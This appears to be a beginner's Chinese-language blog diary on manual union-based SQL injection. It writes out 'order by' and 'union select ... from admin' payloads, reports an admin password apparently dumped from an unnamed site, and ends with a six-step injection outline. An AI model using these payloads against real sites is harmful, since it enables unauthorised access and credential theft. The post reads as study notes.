菜鳥日記之手動破解使用者名稱和密碼
十一月八日 晴朗。
先放一個名詞:聯合查詢
這兩篇部落格都解釋的挺清楚的。感覺一定要自己動手做一遍才能記住,現在只是理解,還不夠。----
下面記一次神奇的SQL注入破解:
step1:
在連結後加上 order by 11 ------------------->頁面顯示正常
改成 order by 12 ---------------------->頁面報錯
===========》說明此站欄位長度為11
二、爆管理員使用者名稱及密碼
step 1:
在連結後面加上 union select 1,2,3,4,5,6,7,8,9,10,11 from admin
頁面顯示數字 2 ,3 =========》說明可以爆出管理員的使用者名稱和密碼
step2:
連結後改成union select 1,admin,password,4,5,6,7,8,9,10,11 from admin
於是,可以看到使用者名稱admin和密碼bfpms
雖然爆出來了,但我還是很好奇為啥能爆出來=。=
★ 手工聯合查詢注入技術
這兩個部落格講的都不錯,從寫工具的角度去考量整個SQL注入也是個新的學習角度。是該補補python基礎了T-T。
總結一下這些部落格總的的手工注入的流程:
step1:
判斷是數字型還是字元型注入
step2:
判斷查詢列數
step3:
判斷顯示位
step4:
獲取資料庫所有表名
step5:
獲取資料庫、表中欄位名
step6:
獲取欄位資料